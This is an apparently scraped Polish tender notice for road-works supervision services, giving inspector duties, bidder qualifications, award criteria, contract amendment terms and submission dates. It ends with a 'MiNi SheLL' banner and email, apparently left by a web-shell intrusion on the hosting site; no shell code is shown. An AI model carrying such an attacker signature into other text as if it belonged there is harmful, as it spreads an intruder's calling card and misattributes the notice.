ścieralnej z płyt betonowych na wyspach<br/>dd)	Wykonanie pobocza z kruszywa łamanego (uwaga zamiast opaski należy wykonać pobocza z kruszywa łamanego),<br/>ee)	Wykonanie rowów przez ich wyprofilowanie, obłożenie ziemią roślinną i obsianie trawą, a rów umocować płytami eco<br/>ff)	Rekultywacja zieleńców przez ich oczyszczenie, pokrycie ziemią roślinną i obsianie trawą, zasadzenie krzewów na wyspie ronda i na zieleńcach wokół ronda<br/>gg)	Wprowadzenie stałej organizacji ruchu<br/>4)	Szczegółowy zakres robót budowlanych został określony w dokumentacji projektowej, która dostępna jest na stronie internetowej https://zdpotwock.eb2b.com.pl w postepowaniu na roboty budowlane – ZDP/P-23/2022<br/>5.	Informację dotyczące inspektora:<br/>1)	Zamawiający wymaga, aby wykonawca zapewnił osobę, która będzie pełniła funkcję wiodącego inspektora nadzoru posiadającego uprawnienia do kierowania robotami budowlanymi bez ograniczeń, w specjalności drogowej,<br/>2)	Wykonawca pełnić swoje obowiązki zgodnie z przepisami polskiego prawa budowlanego, zadania Inspektora Nadzoru będą obejmowały zarówno pełnienie Nadzoru inwestorskiego, jak i rozliczenie i sprawozdawczość budowy (monitoring i kontrola wykonania zadania na roboty pod względem technicznym, finansowym, organizacyjnym i czasowym).<br/>3)	Inspektor Nadzoru Inwestorskiego (Wykonawca) reprezentuje Zamawiającego na budowie poprzez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową, specyfikacjami technicznymi, przepisami, zasadami wiedzy technicznej oraz umową zawartą z wykonawcą robót budowlanych.<br/>4)	Zamawiający przewiduje płatności częściowe po odebraniu prac częściowych od Wykonawców, potwierdzone protokołem częściowym. Płatność zgodnie z zatwierdzonym przez Zamawiającego harmonogramem płatności tożsamym z harmonogramem płatności Wykonawcy robót budowlanych <br/>5)	Do obowiązków Inspektora Nadzoru należy:<br/>	Zapoznanie się z dokumentacją, terenem budowy, jego uzbrojeniem i zagospodarowaniem,<br/>	Uczestniczenie w protokolarnym przekazaniu terenu budowy,<br/>	Sprawdzenie wytyczenia przez wykonawcę robót: trasy, docelowego ukształtowania terenu objętego robotami oraz pozostałych prac w zakresie pomiarów sytuacyjno – wysokościowych i weryfikacja ich zgodności z dokumentacja projektową,<br/>	Sprawdzanie, wprowadzanie uwag i akceptowanie harmonogramów rzeczowo – finansowych,<br/>	Prowadzenie wszelkich niezbędnych kontroli zgodności cech jakościowych elementów robót i materiałów zgodnie z wymogami specyfikacji technicznych wykonania i odbioru robót,<br/>	Akceptowanie organizacji, receptur i technologii wykonania robót zgodnie z wymogami SST,<br/>	Akceptowanie wszystkich zastosowanych do budowy materiałów pod kątem ich rodzaju, parametrów technicznych, cech i źródeł pochodzenia,<br/>	Kontrola i ocena przedkładanych świadectw jakościowych, aprobat technicznych, deklaracji zgodności oraz atestów na materiały i elementy sprowadzane z zewnątrz w celu wykorzystania w procesie robót budowlanych, kontrola sposobu składowania i przechowywania materiałów,<br/>	Egzekwowania od Wykonawcy robót wymaganych badań i pomiarów<br/>	Kontrolowanie przestrzegania przez Wykonawcę Robót zasad BHP,<br/>	Sprawdzanie zgodności robót z dokumentacją projektową oraz przepisami techniczno-budowlanymi, normami i przepisami BHP,<br/>	Sporządzanie protokołów odbiorów częściowych i końcowych, <br/>	Sporządzanie protokołów z narad i przekazywanie ich Zamawiającemu i Wykonawcy robót w terminie 3 dni od dnia narady<br/>	Zapewnienie dokumentowania przebiegu robót w dzienniku budowy lub w innej uzgodnionej z zamawiającym formie<br/>	Kontrolowanie ilości i terminowości wykonanych robót,<br/>	Składania miesięcznych raportów z postępu prac,<br/>	Opiniowanie wniosków Wykonawcy w sprawie zmian sposobu wykonania robót budowlanych w stosunku do dokumentacji projektowej lub wykonania robót dodatkowych lub zamówień dodatkowych czy uzupełniających, a po ich zatwierdzeniu przez Zamawiającego uzgodnienie tych zmian z projektantem sprawującym nadzór nad realizacją dokumentacji projektowej,<br/>	Opiniowanie wniosków Wykonawcy prac w sprawie zmiany sposobu wykonywania robót budowlanych, w tym zmiany materiałów, urządzeń i technologii<br/>	Przyjęcie zgłoszenia Wykonawcy o zakończeniu robót i po sprawdzeniu dokumentacji powykonawczej powiadomienie Zamawiającego o gotowości robót do odbioru końcowego,<br/>	Sporządzenie dokumentacji fotograficznej<br/>	Wnioskowanie Zamawiającemu zastosowania kar umownych <br/>	Kontrolowanie czy roboty są prowadzone zgodnie z Czasową Organizacją Ruchu <br/>	Kontrolowanie zabezpieczenia przez wykonawcę placu budowy w okresie zimowym,<br/>	Godziny prac inspektorów nadzoru w tym inspektorów robót branżowych muszą być dostosowane do godzin pracy Wykonawcy,<br/>	Zwoływania comiesięcznych lub w razie konieczności częstszym narad dotyczących postępu robót, w których biorą udział przedstawiciele wszystkich zaangażowanych w realizację zadania na roboty stron<br/>	Żądania od Wykonawcy prac, dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdy ich kontynuacja mogła wywołać zagrożenie bądź spowodować niezgodność z dokumentacją projektową<br/>	Uczestniczenie w przeglądach gwarancyjnych<br/>	Wystawiania wszelkich niezbędnych dokumentów związanych z realizacją zadania inwestycyjnego, wymaganych przez zamawiającego<br/>	Rozpatrywanie wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją zadania inwestycyjnego i rozwiązywanie problemów z tym związanych,<br/>	Realizowanie wszystkich innych czynności i zarządzeń określonych przez zamawiającego, które będą niezbędne do poprawnej realizacji zadania inwestycyjnego i zabezpieczenia interesu Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwość pobytu na budowie inspektora nadzoru w branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> CZĘŚĆ I<br/>1)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.<br/>2)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie,<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym zakresie,<br/>c)	sytuacji ekonomicznej i finansowej – Zamawiający nie stawia warunku w powyższym zakresie,<br/>d)	zdolności technicznej i zawodowej:<br/>Zamawiający uzna za spełniony, jeżeli wykaże, że:<br/>a)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował jedną umowę polegającą na sprawowaniu nadzoru inwestorskiego na budowie/ przebudowie lub rozbudowie drogi publicznej min. klasy Z o wartości zadania minimum 500 000,00 zł brutto <br/>b)	dysponuje lub będzie dysponował na czas realizacji zamówienia inspektorem nadzoru w specjalności drogowej posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności inżynieryjnej drogowej bez ograniczeń oraz będącym członkiem izby inżynierów budownictwa , legitymujący się doświadczeniem zawodowym, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, polegającym na wykonywaniu nadzoru inwestorskiego na minimum jednym zadaniu polegającym na budowie/ przebudowie lub rozbudowie drogi publicznej minimum klasy Z <br/>c)	dysponuje lub będzie dysponował na czas realizacji zamówienia inspektorem nadzoru w specjalności teletechnicznej posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej telekomunikacyjnej oraz będącym członkiem izby inżynierów budownictwa, legitymujący się doświadczeniem zawodowym, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, polegającym na wykonywaniu nadzoru inwestorskiego na minimum jednym zadaniu polegającym na budowie/ przebudowie lub rozbudowie sieci teletechnicznej o wartości minimum 50 000,00 zł,<br/><br/>CZĘŚĆ II<br/>3)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu.<br/>4)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie,<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie stawia warunku w powyższym zakresie,<br/>c)	sytuacji ekonomicznej i finansowej – Zamawiający nie stawia warunku w powyższym zakresie,<br/>d)	zdolności technicznej i zawodowej:<br/>Zamawiający uzna za spełniony, jeżeli wykaże, że:<br/>a)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, zrealizował jedną umowę polegającą na sprawowaniu nadzoru inwestorskiego na budowie/ przebudowie lub rozbudowie drogi publicznej min. klasy Z o wartości zadania minimum 500 000,00 zł brutto <br/>b)	dysponuje lub będzie dysponował na czas realizacji zamówienia inspektorem nadzoru w specjalności drogowej posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności inżynieryjnej drogowej bez ograniczeń oraz będącym członkiem izby inżynierów budownictwa, legitymujący się doświadczeniem zawodowym, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, polegającym na wykonywaniu nadzoru inwestorskiego na minimum jednym zadaniu polegającym na budowie/ przebudowie lub rozbudowie drogi publicznej minimum klasy Z na łącznym odcinku min. 0,5 km,<br/>c)	dysponuje lub będzie dysponował na czas realizacji zamówienia inspektorem nadzoru w specjalności elektroenergetycznej posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz będącym członkiem izby inżynierów budownictwa, legitymujący się doświadczeniem zawodowym, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, polegającym na wykonywaniu nadzoru inwestorskiego na minimum jednym zadaniu polegającym na budowie/ przebudowie lub rozbudowie sieci elektroenergetycznej o wartości minimum 100 000,00 zł,<br/>d)	dysponuje lub będzie dysponował na czas realizacji zamówienia inspektorem nadzoru w specjalności teletechnicznej, posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności teletechnicznej oraz będącym członkiem izby inżynierów budownictwa, legitymujący się doświadczeniem zawodowym, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, polegającym na wykonywaniu nadzoru inwestorskiego na minimum jednym zadaniu polegającym na budowie/ przebudowie lub rozbudowie sieci teletechnicznej o wartości minimum 50 000,00 zł, <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie art. 108 ust .1 pkt 1, 3, 4, 5<br/>podstaw wykluczenia z postępowania oraz art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę służących ochronie bezpieczeństwa narodowego</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)<br/>wykazu usług wykonanych w okresie ostatnich trzech lat przed upływem terminu składania oferta jeżeli okres działalności jest<br/>krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotu, na rzecz których dostawy zostały<br/>wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencję bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były<br/>wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty w przypadku świadczeń okresowych lub<br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonanie powinny być wydane nie<br/>wcześniej niż trzy miesiące przed upływem terminu składania ofert albo wniosku o dopuszczenie do udziału w postepowaniu – załącznik do SWZ <br/>b) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego w szczególności odpowiedzialnych za<br/>świadczenie usługi wraz z informacjami na temat ich uprawień i doświadczenia niezbędnych do wykonania zamówienia publicznego,<br/>a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami, do wykazu należy<br/>dołączyć kopie uprawień potwierdzających posiadane kwalifikację poszczególnych osób skierowanych do realizacji zamówienia,<br/>oraz przedłożenie dokumentów potwierdzających opracowanie dokumentacji projektowej wskazanej w przedmiotowym wykazie –<br/>załącznik do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W przypadku powołania się na rozwiązania równoważne Zamawiający żąda złożenia przedmiotowych środków <br/>dowodowych wraz z ofertą. <br/>W przypadku gdyż wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone <br/>przedmiotowe środki dowodowe okrążą się niekompletne Zamawiający wezwie do ich złożenia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> W przypadku powołania się na rozwiązania równoważne Zamawiający żąda złożenia przedmiotowych środków <br/>dowodowych wraz z ofertą. <br/>W przypadku gdyż wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone <br/>przedmiotowe środki dowodowe okrążą się niekompletne Zamawiający wezwie do ich złożenia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 28) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>29) W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Umocowanie należy przedłożyć wraz z ofertą – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania. Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem (liderem).<br/>30) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołącza do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane wykonują poszczególni wykonawcy.<br/>31) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <br/>32) Wykonawcy wspólnie ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą na trzy dni<br/>przed zwarciem umowy w sprawie zamówienia publicznego są zobowiązaniu przedstawić zamawiającemu stosowną umowę<br/>regulującą współprace tych Wykonawców występujących wspólnie, zawierającą w swej treści następujące postanawiania:<br/> Określenie celu gospodarczego<br/> Oznaczenie czasu trwania konsorcjum, obejmującego okres realizacji przedmiotu zamówienia,<br/> Podział zadań pomiędzy poszczególnych Wykonawców występujących wspólnie, zgodnie z oświadczeniem,<br/> Wykluczenie możliwości wypowiedzenia umowy wspólnej przez któregokolwiek z Wykonawców występujących do czasu<br/>wykonania zamówienia w całości,<br/> Solidarną odpowiedzialność Wykonawców występujących wspólnie za realizację przedmiotu zamówienia,<br/> Solidarność Wykonawców jako wierzycieli względem wierzytelności, które będą im przysługiwały w związku z realizacją<br/>przedmiotu zamówienia w ramach zawartej z Zamawiającym Umowy<br/> Określenie sposobu płatności wynagrodzenia przez Zamawiającego przysługującego Wykonawcom w związku z realizacją<br/>zamówienia, zgodnie z którym faktury na rzecz Zamawiającego będzie wystawiał Lider, który będzie się rozliczał<br/>wewnętrznie z drugim członkiem konsorcjum <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4. Zamawiający na podstawie art. 455 ust. 1 ustawy pzp przewiduje zmiany niniejszej umowy:<br/>1) zmiany w okresie obowiązywania umowy stawki podatku od towarów i usług VAT – jeżeli Wykonawca wykaże, że zmiana<br/>ta dotyczyła materiałów lub urządzeń niezbędnych do wykonania przedmiotu umowy albo kosztów robocizny oraz że poniósł on z tego tytułu dodatkowe koszty i do wysokości udokumentowanych dodatkowych kosztów Wykonawcy z tego tytułu oraz<br/>jeżeli zmiany te będą miały rzeczywisty wpływ na koszty wykonania przedmiotu umowy przez Wykonawcę.<br/>2) Dopuszcza się również możliwość zmian postanowień umowy, która została zawarta na okres powyżej 6 miesięcy, w<br/>przypadku, gdy konieczność wprowadzenia zmiany spowodowana jest zmianą powszechnie obowiązujących przepisów, w<br/>tym w szczególności w zakresie zmiany wysokości wynagrodzenia należnego Wykonawczy, w przypadku zmiany:<br/>a) Ustawowej stawki podatku od towarów i usług oraz podatku akcyzowego – wówczas w zależności od faktu czy stawka<br/>została podwyższona czy zmniejszona – zmianie może ulec wynagrodzenie Wykonawcy tj. odpowiednio zostać zwiększone<br/>lub obniżone,<br/>b) Wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie<br/>przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę – wówczas w zależności od faktu<br/>udowodnienia przez Wykonawcę, iż zmiana wpływa na koszty wykonania przedmiotu umowy przez Wykonawcę – zmianie<br/>może ulec wynagrodzenie Wykonawcy. Wykonawca w celu udowodnienia zaistnienia przedmiotowej sytuacji musi<br/>przedłożyć wniosek, w którym musi odnosić się do złożonej oferty i zawierać szczegółowe uzasadnienie wzrostu wysokości<br/>wynagrodzenia oraz przedstawić wpływ zmian wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej<br/>stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu<br/>za pracę na wysokość wynagrodzenia Wykonawcy,<br/>c) Zasad podlegania ubezpieczeniom społecznym, ubezpieczeniu zdrowotnym lub wysokości stawki składki na<br/>ubezpieczenie społeczne lub zdrowotne – wówczas w zależności od faktu udowodnienia przez Wykonawcę, iż zmiana ta<br/>wpływa na koszty wykonania przedmiotu umowy przez Wykonawcę – zmianie może ulec wynagrodzenie Wykonawcy.<br/>Przedmiotowe udowodnienie musi odnosić się do złożonej przez Wykonawcę oferty i zawierać szczegółowe uzasadnienie<br/>wysokości wynagrodzenia oraz przedstawiać wpływ zmiany zasad podlegania ubezpieczeniom społecznym,<br/>ubezpieczeniom zdrowotnym lub wysokości składki na ubezpieczenia społeczne lub zdrowotne na wysokość wynagrodzenia<br/>Wykonawcy <br/>d) Zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4<br/>października 2018 r. o pracowniczych planach kapitałowych (tekst jedn. Dz. U. z 2020 r. poz. 1342 z późn. zm.) – wówczas<br/>w zależności od faktu udowodnienia przez Wykonawcę, iż zmiana ta wpływa na koszty wykonania przedmiotu umowy przez<br/>Wykonawcę – zmianie może ulec wynagrodzenie Wykonawcy. Przedmiotowe udowodnienie musi odnosić się do złożonej<br/>przez Wykonawcę oferty i zawierać szczegółowe uzasadnienie wpływu zmiany zasad gromadzenia i wysokości wpłat do<br/>pracowniczych planów kapitałowych na wysokość wynagrodzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-11 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdpotwock.eb2b.com.pl/edit-auction.html/379310</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-11 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-02-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania umowy szacowany od dnia podpisania mowy do dnia przekazania raportu końcowego jednak nie później niż do 15.12.2023. <br/><br/>Faktyczny termin wykonania usługi zależny jest od zakończenia postępowania na wybór Wykonawcy zadania na roboty i zawarcia umowy z Wykonawcą oraz zakończenia robót budowlanych.

Creat By MiNi SheLL
Email: jattceo@gmail.com